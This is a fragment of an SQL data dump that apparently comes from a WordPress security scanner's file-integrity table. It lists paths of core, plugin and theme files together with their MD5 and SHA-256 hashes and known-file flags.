(0x012e0fb33e76f2b9501f1cea5b8d315b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/crown.svg', 0, 0x0db75f2f6e0d7438747795ab756761e8, 0x0db75f2f6e0d7438747795ab756761e8, 0xaf864f19458360b75753d64beecd2fecbc71664c61ce3c95af8bf831bf1d0c99, '', 0, '?'),
(0x01318448a74df7f46723124b3a21e2c5, 'wp-content/plugins/revslider/includes/framework/aq-resizer.class.php', 0, 0xb6ab2e8773e68ec9f4c3aa5c98db96bf, 0xb6ab2e8773e68ec9f4c3aa5c98db96bf, 0xd2a6e41f2181c0c3ace5d89b871a9fd151f3f5352fc0b5238fc87993ea844712, '', 0, '?'),
(0x014e519e222a687a1caa72c3777c1af8, 'wp-admin/images/media-button-other.gif', 1, 0x00000000000000000000000000000000, 0xa55126545e825d4242990e670227f9c3, 0xfda1421aea72b646ff06d092c31c89811450762d5e6654bf2ccac15fc2c91169, '', 0, '?'),
(0x0158fd18c998795f07f137a5584e1d2f, 'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php', 1, 0x00000000000000000000000000000000, 0xe3e5f2cc1afac12e2a3ac3ae882bbe31, 0x96af1ac1fa0cbade94ce6513678f299ef251524382e4418716196defd612f5f4, '', 0, '?'),
(0x015b93efc77c358515b148278fd58cc0, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/upload.php', 0, 0x277a02fc4596fbe3d1a84d607dce6825, 0x277a02fc4596fbe3d1a84d607dce6825, 0x47fbe5e374747b678aeb0e8877dfed2216004e06d69dff3201089c5539253b2a, '', 0, '?'),
(0x015db3d66a89c752051da402fe89581e, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php', 1, 0x00000000000000000000000000000000, 0xf7b42f2f1952b78482e1cc6ae3e9c92e, 0x17f60ea53327139d580dcb6f91602fd7107f04d344d8f908a0bde92ff2ba331a, '', 0, '?'),
(0x015dc62d6d87b32de89d73f58fb153d6, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_24px.svg', 0, 0x65e47f10e9cbbc03bb9cc518191f6a6c, 0x65e47f10e9cbbc03bb9cc518191f6a6c, 0xf156ab375ee6cdd092f85efb902234f4bbfa15aeba870321760711aa76a7aaca, '', 0, '?'),
(0x015f317a08d4e61bb31b83ad2a6fbb3e, 'wp-content/plugins/revslider/admin/assets/imports/woobig/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x016e735716f287dd659c7ddeccd9b3be, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone.php', 0, 0x7ec9a18ba77c631fe1dc91d63d44f016, 0x7ec9a18ba77c631fe1dc91d63d44f016, 0x846f2f00b849f7d0403979fefb77ba232221bf9180cf7cdb55dce0978dab0690, '', 0, '?'),
(0x0172b1c4f8bcdc9f97ac4db228238160, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_vintage_24px.svg', 0, 0x73da27810a88dd7e7f859da397c034e5, 0x73da27810a88dd7e7f859da397c034e5, 0x9fd7557578b4979b84eb8a6384b55a7afeb00c6f4264d46ab3e43ab5013e8d11, '', 0, '?'),
(0x0187e77f212d46503b7b00e67c4ef854, 'wp-content/plugins/revslider/includes/framework/addon-admin.class.php', 0, 0x70e445e38894ac922353f141b018ccbd, 0x70e445e38894ac922353f141b018ccbd, 0x9656f31c58623a7c7db4cc79045916f5f041057c40220d95667a868aa30e320d, '', 0, '?'),
(0x01890781f5f63c3f42553ce723da6ee0, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_expandable_section.php', 0, 0xca948dde778030ec6dd895d8d914406e, 0xca948dde778030ec6dd895d8d914406e, 0xd72026b6b2c03ee492f84dd505fba2db657ff4a9f8baff7251f7c29871816002, '', 0, '?'),
(0x019954ea68cbd4ec7a07509ff91972e9, 'wp-admin/widgets.php', 1, 0x00000000000000000000000000000000, 0x9c0b1f45d013e678c40b3bb5ceb9af4d, 0x5fff1bcdbbd8dc0e97d478b77821629b2dc4bf1540665d091a13daf70841c021, '', 0, '?'),
(0x0199cf8bd094274f740cfb06ca974d3b, 'wp-includes/js/dist/deprecated.min.js', 1, 0x00000000000000000000000000000000, 0x6b4d9b1bb83a32e0584a2d96813914d4, 0x6f2a3e530cfcd42257d9b966e7b97771dfea6ef8c7379e15a3a2a46d8c8b7991, '', 0, '?'),
(0x01b726881e7542314f04b9419071d70a, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/admin-media.js', 0, 0x894f0c4e2f31657604cb45a7440e28a6, 0x894f0c4e2f31657604cb45a7440e28a6, 0x7771cb3f908793123a9b42fe87253ac0797a9a22ebdd7b1d24cbc8b06a7cdd7c, '', 0, '?'),
(0x01c1f938481f62a6064d1c41eff51d96, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_translate_24px.svg', 0, 0x0a980867f2d1f81451bf124fa563f985, 0x0a980867f2d1f81451bf124fa563f985, 0xe3f2dbce4e89765ea13f8e1984c1cb8c00d06d532a29da69697d3d821f5f1ea0, '', 0, '?'),
(0x01dd864de338666e271e4f50b8a1dac6, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_column_24px.svg', 0, 0x24080d7b22007adf7a8f5e52821138cc, 0x24080d7b22007adf7a8f5e52821138cc, 0xf51ef68fc379c7b976d6541be869c62a670f50b05ec0c4d26e60c0f26f8b79cb, '', 0, '?'),
(0x01e0869ebbf175c8bc9c0665d8e721e2, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/fonts/WooComposer.svg', 0, 0xb1212ed468ea350351f515413d2438ac, 0xb1212ed468ea350351f515413d2438ac, 0x8af14c5c59e6f4df8705dc1554d85f8ae1224c5e8763754992671a0978041848, '', 0, '?'),
(0x01e4e816453f744239628d9776466031, 'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png', 1, 0x00000000000000000000000000000000, 0xacf427e932fb9413700a4b8b58b41eec, 0xcdce8e2558efc59646bcffe7dcf23173cf3bc01bce174ceb7a721618e792bb11, '', 0, '?'),
(0x01ff6baafa0f1f280092c7ad16df4d84, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser02.svg', 0, 0xae5f5dfda6245fe81442128491ff7fe5, 0xae5f5dfda6245fe81442128491ff7fe5, 0x413d8d7b39a9ca9aa2dab9738226fe43cb4a8c30fd9ef14b47773d41f94957f7, '', 0, '?'),
(0x0212ecfaa1d8f7b11f8cf1248263c897, 'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1579191227.js', 1, 0x00000000000000000000000000000000, 0x805c7dc322a386178b37dab79295445a, 0xdf2e49f4481a0f841b6700f39d4821376091a367dea05af87ac88483c5be367c, '', 0, '?'),
(0x0215745d95d99f75c3d575dbfce56afb, 'wp-admin/images/menu-vs.png', 1, 0x00000000000000000000000000000000, 0x719980f24cf02c0c5fa53b312fef45ac, 0x47b26948180f7cfc13d706299db6453bb3bd225fe33bd4a334d4bb77946c79c1, '', 0, '?'),
(0x0217a8917eb87760b2353b4611e3aeae, 'wp-includes/js/jquery/ui/effect-size.min.js', 1, 0x00000000000000000000000000000000, 0x706b0892dc2ec793f195f2a3f2402edc, 0x9fc833b50037cb35da18497142677dbab6d283afd3ecf69f54aaa6ba9887633a, '', 0, '?'),
(0x0217f48d7f133dfcf071af0d6c6a412b, 'wp-admin/user/user-edit.php', 1, 0x00000000000000000000000000000000, 0x2a7a75a363b0f88f0b6d094a91ef65ea, 0xe595b1e1e5ccb10909e570405ccda9d888d4d139bf2e613e768359caa2898c35, '', 0, '?'),
(0x023c2938542a2e8d53017553d2c4ba9f, 'wp-includes/SimplePie/Cache/MySQL.php', 1, 0x00000000000000000000000000000000, 0xe8911ece15df42ca43991a48d5785687, 0x74bc0e89d9419e9342d9a00ce31c423d29dcde0152684f999322a0c767a9013b, '', 0, '?'),
(0x0248438318ecdc21f303abaa11222888, 'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css', 1, 0x00000000000000000000000000000000, 0xe5313168fb2b657a4bd2f5e06b931a22, 0x2a1333c655fb02230a5d9b5d1875686f0d039c8a18ceb2e10d3b3510196aafe1, '', 0, '?'),
(0x024a0e0ff30dd3b747073e90fb8284f5, 'wp-includes/class-walker-page-dropdown.php', 1, 0x00000000000000000000000000000000, 0xb37442a31b42328a5b654ab7e935df61, 0x13599544077334bc9d493c88eaf0db41f274ecc883b1b3a91a89964786e5c32e, '', 0, '?'),
(0x024dcfff603e48be7ee4d2f532471908, 'wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php', 0, 0x9db98d91e037610ed7fbada5899fe8ae, 0x9db98d91e037610ed7fbada5899fe8ae, 0x7ef80ac5e497dcc70029140d334174359b5f751d468693a03979c77f59625d5f, '', 0, '?'),
(0x024fba5095f0f430e5ebb12dee509864, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_phone_24px.svg', 0, 0x3857464b453fda6d17b75402cc4476c0, 0x3857464b453fda6d17b75402cc4476c0, 0xe45431a5071178e70cec8d2ebccf17da177e638345f362d48f471e419feb9376, '', 0, '?'),
(0x02693fa3b3e4526cf16b0494678760db, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-acf.svg', 0, 0xc0a489ac4f42c68b540abc937cff585b, 0xc0a489ac4f42c68b540abc937cff585b, 0x7dee1a13a2a816245cb136b8e979aed6ca2cc2fa4e18314fbd786f5f8b6414f7, '', 0, '?'),
(0x02751edec773b69b793627762caade3d, 'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xe9bdf549df031fe6b583e818dac7e4fd, 0xc62774d643943605ffd2eee52cac66e9cb68266129ad905d9af8f593c302d3e5, '', 0, '?'),
(0x0275ee6359624b09d418a7e7187988f7, 'wp-content/plugins/wp-super-cache/plugins/jetpack.php', 1, 0x00000000000000000000000000000000, 0x7e663210540d18719ca4a2f3a013cd72, 0x70ee72b1eca4d04141af21541e99ac880b8e822b4fd56261ce52da90339a4130, '', 0, '?'),
(0x027ff622c57155798484a339ec2551a6, 'wp-includes/class-wp-matchesmapregex.php', 1, 0x00000000000000000000000000000000, 0x585279713246292c89ebeaddebc501cd, 0x154893b266b805771973cba6f6fe588e8174b78030df6e6a03e68c11ba456394, '', 0, '?'),
(0x028f3ab7be30e6ad6f7546e94a5bf030, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/js/us_grid_layout.js', 0, 0x1e3bfdd00fc659a3311b85e2fc5561ce, 0x1e3bfdd00fc659a3311b85e2fc5561ce, 0x95cd32ee9ba5689e3160a6f81e26afad736cad30f3cc6a9c6b71a1d99b4acfae, '', 0, '?'),
(0x02cc201f88fbfec84b2069964493c174, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php', 1, 0x00000000000000000000000000000000, 0xd8cae603cdc15a7a9a23190748e8e7b2, 0x6e5da8eb7893cb1d1bb6ba9daba41a5f0ed1aa6bd442b3042d61bd0426bdcc83, '', 0, '?'),
(0x02d77d8c5de0d8f08aee970685c2dcc2, 'wp-content/plugins/revslider/admin/assets/imports/web-product-light-hero-3d/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x02de1994e4a5ea1c37992687f20cc880, 'wp-includes/js/tinymce/skins/lightgray/content.min.css', 1, 0x00000000000000000000000000000000, 0x0be8f6d47b7eb85f49cbb5b54feb4b40, 0x25a75c982e15af22f3bd55d29a56ec26ec39845c5d8cd45e64259ea9cc7a6724, '', 0, '?'),
(0x02dece2a28b3932aad2baf576a946370, 'wp-content/plugins/wordfence/crypto/vendor/autoload.php', 1, 0x00000000000000000000000000000000, 0x9ca333d4bf3ae1930456ab09988a5527, 0x9303bbf67c3c8fd1d4fe500f2a7467ab338d647f5973cfdf2f9180fb90d0f891, '', 0, '?'),
(0x02eb38355c52ada4716ff22da9b3d93d, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php', 1, 0x00000000000000000000000000000000, 0x6882e0d113e22478202f99caf306bde9, 0xcf3c62aeef6f62b887b2976e410e19cbe0e745b6fe11ed37135f1914caef474b, '', 0, '?'),
(0x02f70fad3072e3884822e1594b5d54b7, 'wp-admin/css/site-icon-rtl.css', 1, 0x00000000000000000000000000000000, 0x843b8077b07dce1d6bd532aa7ad3e61b, 0xe9ee9207ceb1618d980958670f6b66d8386a866ed1aaae9b3d8126600373d8a7, '', 0, '?'),
(0x030948adaba9fb7e917177135b978b2e, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/countdown.js', 0, 0xa1ca3c2ef1d4b89b1243f532974a357d, 0xa1ca3c2ef1d4b89b1243f532974a357d, 0xf9865bec0360c68bf79976d48e4923d874a91127e2bf7c7f716c1ea06afcb9ff, '', 0, '?'),
(0x0311cccafef5026495786c04a482e8fd, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php', 0, 0xc509bc6c902c14c94fe1b5720cfb4352, 0xc509bc6c902c14c94fe1b5720cfb4352, 0xc87ffc69f74ef6b72d8c24453ac0d66f556181cb065e4c7ed76532267d77d8c4, '', 0, '?'),
(0x032155c15f5c9b126d887e3e05919ddc, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone.svg', 0, 0x25e3588debe193379845041e5a25173e, 0x25e3588debe193379845041e5a25173e, 0xecd4be5e60c65569706daf93d0fd1a0b4716a479ec6667a788cbf0517c483f22, '', 0, '?'),
(0x0328bf800497d199978dc9da00483c5f, 'wp-admin/includes/nav-menu.php', 1, 0x00000000000000000000000000000000, 0x6b12985c36614a28666a5294647eb06d, 0x8e1addacfed46c0a98471c93aa6f2643536e003b44776e0d8d585d4a828a9378, '', 0, '?'),
(0x032b6da6a1b0a22d339137d77ed629a0, 'wp-content/plugins/wordfence/js/wfglobal.1579191227.js', 1, 0x00000000000000000000000000000000, 0x9937e6ac91b66957b4ad35f9756c52a8, 0x24d268a764e75e53efb7f8c6a8c31de43559b0d815939290d9ada18fba61248d, '', 0, '?'),
(0x03313ab9064f4798ecb680f9a05c4d7d, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_24px.svg', 0, 0x42d12e520ed21770c2635231bae85b71, 0x42d12e520ed21770c2635231bae85b71, 0x693f4df8ae9905874f517a33e7bf96e3c624fdee2e887c3b86ff9eb2fe666bc8, '', 0, '?'),
(0x033c2ea6d8348176b7e463992260a674, 'wp-includes/class-wp-simplepie-sanitize-kses.php', 1, 0x00000000000000000000000000000000, 0x6b991aa70873f6fc59da9e8cf6678490, 0x9d12eecee1970e79b6b2d9dc1072a6d182eb91cc272d250a3028249f2d0782f8, '', 0, '?'),
(0x03487a39840238c365568acdd1795273, 'wp-content/plugins/js_composer/include/autoload/vc-settings-presets.php', 0, 0x7c5b7ac9fbae77dd1e4b649c736593eb, 0x7c5b7ac9fbae77dd1e4b649c736593eb, 0x859eb8d948b198891673c34d9a74a50e2adc2be28bf6c324aec22d0318721837, '', 0, '?'),
(0x036916b5074ffc09d2304058280f5920, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart08.svg', 0, 0x9cab366008bd4979a67b34a02bfe7c6f, 0x9cab366008bd4979a67b34a02bfe7c6f, 0x58dd35ad18b9521bcaa9e87b47911b8dc09c3affba0cf57d41e7a6005ecb8aa4, '', 0, '?'),
(0x0369f4a27f5004c399fb966c6400fa91, 'wp-includes/css/jquery-ui-dialog.css', 1, 0x00000000000000000000000000000000, 0x6e27243fb0ec55268be46392ed3f98a0, 0x9df017ee54a2c5872ea92d0a18718d274d36e86a4f2628055a59a23005cd56c6, '', 0, '?'),
(0x036bf19eaf3463edb0b5e1f3d0353c22, 'wp-includes/js/dist/autop.min.js', 1, 0x00000000000000000000000000000000, 0xb7cd543a0b0cd07e45cd1bc25a638726, 0x4e6d8810ea70c358ec71084d8edecb9d4b629682054dbe9563072a97fd8c8c7b, '', 0, '?'),
(0x039958e10e89c27106c9b393e8918249, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-filters.php', 0, 0x8f1cd8d3cfe5ef302f038cccbb11c953, 0x8f1cd8d3cfe5ef302f038cccbb11c953, 0xb33f98ce5475760aa7e268dcc427cd6930a4c11bd482282831898c6a4ac1a38a, '', 0, '?'),
(0x039dcede5bca60be1c2e075750a71d41, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_flag_24px.svg', 0, 0xede24c91689b1f32f4e07e17d5e0b720, 0xede24c91689b1f32f4e07e17d5e0b720, 0xbd842ac65d3400ca4174b0814a5bee9313d42e76048f748c829e5bb9499faed1, '', 0, '?'),
(0x03a6337e669adfa7d1e89783be2063f3, 'wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php', 0, 0x5ccf08a0c017f630bf54bf98b87c53a1, 0x5ccf08a0c017f630bf54bf98b87c53a1, 0x3f400393928b7a8ea017494dcf063d77b451d4ee96f48d48a68ae772dec1cb69, '', 0, '?'),
(0x03b8e21cf32b7b0437b63686aab7c078, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Stats_Counter.php', 0, 0x4ee3c27288beb19d7ee94438a84f23ec, 0x4ee3c27288beb19d7ee94438a84f23ec, 0x7c71652f97608e0869c8ecac627898f20523c52594467544ece1907243e3818e, '', 0, '?'),
(0x03ea3dad4ddadc562a62b572e3780b66, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-video.php', 0, 0x94778c103b46d2cfa63930a5397d430c, 0x94778c103b46d2cfa63930a5397d430c, 0x5de05faf7437a27de46c518d2783dea72aa347308cd4fef57c807c50efce9eca, '', 0, '?'),
(0x040a9106e3eff9222cd7c9d6a2eb9292, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_ring_volume_24px.svg', 0, 0x35712a83a161f170807eabcf1f235be1, 0x35712a83a161f170807eabcf1f235be1, 0x8bf2d23d3c5edc2246ddb840cfb33a1179f2fcd91bf14fb51dd13815ee6f116e, '', 0, '?'),
(0x04219b94c8407c9834abb06e9dadf414, 'wp-includes/class-http.php', 1, 0x00000000000000000000000000000000, 0xfad92277e0d4f126bfc34908f93e2c57, 0xa4e1490be93ae964f140ea6c4045b7b189b3f8d5ed04e34bc57e24c81a1ff339, '', 0, '?'),
(0x0423d66323426bcf0c622d2cf94cce74, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-article.svg', 0, 0x69d4877c9a12214885be02b7478d083c, 0x69d4877c9a12214885be02b7478d083c, 0x58b56318ff614c2ba0b5449f16673a36d59474f5cff09c27385fe986d0ef54bc, '', 0, '?'),
(0x0427da9e003bbebf3fc32b5607d2aace, 'wp-admin/network/edit.php', 1, 0x00000000000000000000000000000000, 0x57b71456749af9c47b780d61d4cd9e1e, 0x030e64ab12c0e6ca1a2d61567ed8f4ef496568bf88b74390e96eec3119dedecc, '', 0, '?'),
(0x042963ec52c059c6472e54683a5b15cf, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_tab_24px.svg', 0, 0x51e313b333d3377d240e6ecb72484efd, 0x51e313b333d3377d240e6ecb72484efd, 0xd84aad56641d2e383b9bad34b379c14cd6a7197d3ff6f7e7d7a38650dbfe2fe0, '', 0, '?'),
(0x043b0770520339b2b62bf3711070d5ae, 'wp-admin/includes/options.php', 1, 0x00000000000000000000000000000000, 0xfb77e8d462557a787c3096ccf920e101, 0xee052b75bd3814574ece3ea73364e303728d3b5510b62ae9fad8c860da26af95, '', 0, '?'),
(0x0445f82617afd1564e05aeb30891224e, 'wp-admin/css/ie.css', 1, 0x00000000000000000000000000000000, 0x5960f69e0ed72d7a00e9bceaa55c9901, 0xe4fcec0e9a764199bcd9f3914807f80087657124f357d5446a9bb34b2b7b6aa8, '', 0, '?'),
(0x0453c768d0f3c5d38c00960fe5b317c8, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-category.svg', 0, 0xb9d273f147c8eda19bd468298abc033b, 0xb9d273f147c8eda19bd468298abc033b, 0x7d291ef2a6e7d43644f2df0f5234c138bda0f5fd86cf5e429c427dd6e2f32707, '', 0, '?'),
(0x0470b4980a832de522f56c226cb497a7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character07.svg', 0, 0x0c4e2b03e372050a114f39a61464e0b9, 0x0c4e2b03e372050a114f39a61464e0b9, 0x827ec0f363451974ab2eb36b7a258f3012874a90b0e8d22fcd1a0e20857b20ae, '', 0, '?'),
(0x0478e0f3916dfc80a500de0f7e90b6c2, 'wp-includes/customize/class-wp-customize-nav-menus-panel.php', 1, 0x00000000000000000000000000000000, 0xd224ea4bcd9e87750951c1b620e470b2, 0xc92f27561a56746202229893d964f0f011d816e973226590f60240e1c9d3493c, '', 0, '?'),
(0x048dedef244fe5f2a6760028ac018bc1, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tab.php', 0, 0xc919b10bfbe18424166bb7c28ffb70ee, 0xc919b10bfbe18424166bb7c28ffb70ee, 0xf132c61f1d68d27071701b5c8f2837a4b590581f342408d1a22396f0d3e7961e, '', 0, '?'),
(0x048f52e52e023cd5e37a6d7f5e298069, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_off_24px.svg', 0, 0x424aba8bc0c4b60eede4771d3cfa72f8, 0x424aba8bc0c4b60eede4771d3cfa72f8, 0xad8193a76f231165d2892866b3bda952c7d922c7aed4a0fdfce99c8a434e03ff, '', 0, '?'),
(0x04a0fae00aee238d54a8ea3fd7bbeccb, 'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php', 1, 0x00000000000000000000000000000000, 0x3d336e2e8f5a4b37e6a152627e3c84f2, 0x4cf28f1781d896836b6eebf081484e9e0aead024faaeafa7dccaa89a23bdabf1, '', 0, '?'),
(0x04b011c39a32e2b17ffb640e03cd3d01, 'wp-includes/rest-api.php', 1, 0x00000000000000000000000000000000, 0xf91f7cbcd226db87b42e1f1c5026c258, 0x05b93ec192e900fbc219537a4cd5050ae56cac494a77ab8f399f0f5b81610991, '', 0, '?'),
(0x04b7500027d8306ca79faf76c8234a3c, 'wp-includes/js/jquery/ui/effect-fold.min.js', 1, 0x00000000000000000000000000000000, 0x8785d9de96bad111926ab4d13014d21f, 0x85b708080ed0c3cb46491633bd2018c5a93c54c68c412253a6382bfd5954fb8a, '', 0, '?'),
(0x04b89f3c81815f2ed8b6931c0f06ccf0, 'wp-content/plugins/wordfence/css/phpinfo.1579191227.css', 1, 0x00000000000000000000000000000000, 0x3ec5eb51f7d8e6218530772fa8e893b4, 0xc705fdfd618f407cadae490d3d1a5eceb5c2641d29885bb6b90ff886ce57b2e5, '', 0, '?'),
(0x04c219f5466f1e710fe6f87e07f8bdce, 'wp-content/plugins/Ultimate_VC_Addons/templates/ult_tab/ult_tab_element.php', 0, 0x9752a4cf3be7d0114959b720962d640f, 0x9752a4cf3be7d0114959b720962d640f, 0x18cb0dbcdf2645b1f880b38e755f81d01a8518bbd7421ac30a7d061d42835501, '', 0, '?'),
(0x04c8840794ced3781879a8e581f58bd6, 'wp-includes/js/tinymce/skins/wordpress/images/embedded.png', 1, 0x00000000000000000000000000000000, 0xf58daaa070dd4ea21bd6790f7ec36e22, 0xbf067bf307b975d578d310278bc0c20ea14aa6c2ba406919221f483bf25d3668, '', 0, '?'),
(0x04cfb4203315080b506023385eddd65a, 'wp-admin/css/colors/coffee/colors.css', 1, 0x00000000000000000000000000000000, 0xfb9e5d2fa6a3a341c965a0df67cd5c20, 0x938aa71f73e808e6b02f560128ad45a35ccea0848585485ea49a557aefb716e1, '', 0, '?'),
(0x04e011cf05188f2455b78a27f848c3a8, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_watch_24px.svg', 0, 0xe89de695c63c28f1cce517215a7967ac, 0xe89de695c63c28f1cce517215a7967ac, 0x7e76d634e7b0e5c83b8ced9030b373d11590eb77554c416b85f7d24424b37a2b, '', 0, '?'),
(0x050542aae65072986666d61d83433505, 'wp-content/plugins/revslider/admin/views/templates/wpml-selector.php', 0, 0xf88ee19d91668ff53f27b3112cdc93c3, 0xf88ee19d91668ff53f27b3112cdc93c3, 0x36360e97057cefa001e35d7606799d0287a5f4bdc9fc041ba252f8cddc45a02a, '', 0, '?'),
(0x0522929f4edfac6a6a29859f008c954e, 'wp-admin/images/menu-2x.png', 1, 0x00000000000000000000000000000000, 0x6a47fff5fee2f97bbf3eaf5e3b2482d3, 0x96325d79e214d72368bde2c432f639f83e205e7380100d48e5090adbdc679ac3, '', 0, '?'),
(0x05230c7060432433da8e83251f00a435, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_attachment_24px.svg', 0, 0x8bc073967b26122276e7bea8d4ca76e7, 0x8bc073967b26122276e7bea8d4ca76e7, 0x158d5e1b44b3a581ee854be6d339404faa05d8886bb6ae9678c5121457c41cf9, '', 0, '?'),
(0x05302705aafc60fb0ce163c0325fcf13, 'wp-content/plugins/revslider/public/assets/fonts/font-awesome/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x055b26536317e1335a850c3644f0977e, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_clear_24px.svg', 0, 0xaddfce46ee90a4cc5f8d1aa464ab9822, 0xaddfce46ee90a4cc5f8d1aa464ab9822, 0x4dfe728703593574c1d9114aaca0ce241559bc4920c53f82ecbec0ece0955ee2, '', 0, '?'),
(0x0571a88813e35f220f0cf1311915c946, 'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php', 1, 0x00000000000000000000000000000000, 0xd99e3058b29cd6d435e7557ac1aa333d, 0xf4da0669a8b25d538703c00fd1c3429638b9f48686e9438220079c2d3a99f2fa, '', 0, '?'),
(0x05745a518fa5597a3085fabddfe8b7ab, 'wp-admin/images/wordpress-logo.png', 1, 0x00000000000000000000000000000000, 0xc6b0f979b9e66fc338f4cb3853a5608a, 0x620178c3054cfc50cdb0e9e23d5e92ede5f7b9611cf56dcfc5f1babb3169b3df, '', 0, '?'),
(0x058d37fbfab7b25f95e8da7d9a961a65, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_voice_24px.svg', 0, 0x64b631e72aa6d2b1928ac11e9adfbe29, 0x64b631e72aa6d2b1928ac11e9adfbe29, 0xd7a77b7a59bed0a0aa80a35e90009852f791dae07113fce252253c1db02961d6, '', 0, '?'),
(0x059cfd976b9235538148e5d0e7d0ab1e, 'wp-includes/SimplePie/Author.php', 1, 0x00000000000000000000000000000000, 0x348071ed105ff0418b25964e771ba331, 0x6e23b94f102fcb6a62e1f07750266991d123b09e015f60dfd4f059d09ec317c1, '', 0, '?'),
(0x05a2d81bc01d65df6257fc4130cf1e64, 'wp-admin/images/comment-grey-bubble.png', 1, 0x00000000000000000000000000000000, 0x8f59128f2a27b489b0a974c0b6b21046, 0x3709ae8d79b2f1ae8cacd0e8557bc319ae13a688d49fe382c560a1a75d6da2f3, '', 0, '?'),
(0x05a67e41f37d43a1797e2c734a349374, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shopping-cart.svg', 0, 0xe812b71ec41822354b247a6f5a507946, 0xe812b71ec41822354b247a6f5a507946, 0x546fff917993bd835c92942a9ae37c1c4c7f21058444fceba3544dc4036edce1, '', 0, '?'),
(0x05af1ec618416c0bd4e16f46f8aa3ccd, 'wp-content/plugins/js_composer/index.php', 0, 0xaaa1de3f6c9aaab8acbe8abf30384b0b, 0xaaa1de3f6c9aaab8acbe8abf30384b0b, 0xa908493149bc0f6c9400da91f2fbe9aa47eb9fa1246a7340cb55e8c784244077, '', 0, '?'),
(0x05b3955ba98c081bc234e2f2b03f8d73, 'wp-includes/css/dist/block-library/editor.min.css', 1, 0x00000000000000000000000000000000, 0xf65c797ff4bdc97a61590c4106b43a52, 0xee110a393e02ad273d62c6dee58dad4db657c90ff16a1c416572cb02c1201c5e, '', 0, '?'),
(0x05c4490161bb0e0a0bd88e9a96ead061, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php', 1, 0x00000000000000000000000000000000, 0xcd01a2810cbe3e1aebf0b01a2b950f2c, 0x2a792498084d515b1571d3023a68e99a0122eec0f929a358544313000feb5c6b, '', 0, '?'),
(0x05e758cd402bbb38964cff7f1b1e181c, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-basic-grid.php', 0, 0xecae3bd358ef94f657cf3ed18ac7eb9d, 0xecae3bd358ef94f657cf3ed18ac7eb9d, 0x95256c7933d5aa82616b1b405c8d2c98b647a9a0077579d75fb0bb2fbf79d0de, '', 0, '?'),
(0x05f4d5a80a06ac70686a69613182a8ff, 'wp-content/plugins/js_composer/include/params/load.php', 0, 0x852b0d19e46387e387c15d56f3473aa5, 0x852b0d19e46387e387c15d56f3473aa5, 0x554c2a0e0dcf11c84d080c8e90feefd75e66e460b6150bf9db4dd87e50ba155b, '', 0, '?'),
(0x05f5efb4e2b75c5ebc732ce87a281918, 'wp-content/plugins/wordfence/lib/dashboard/widget_tdf.php', 1, 0x00000000000000000000000000000000, 0x32b2cfdd08bdad1827b3705b55618748, 0xb7cc3fe2047d04118aa08a6d0c817744870511716e8aec023252179086805cb8, '', 0, '?'),
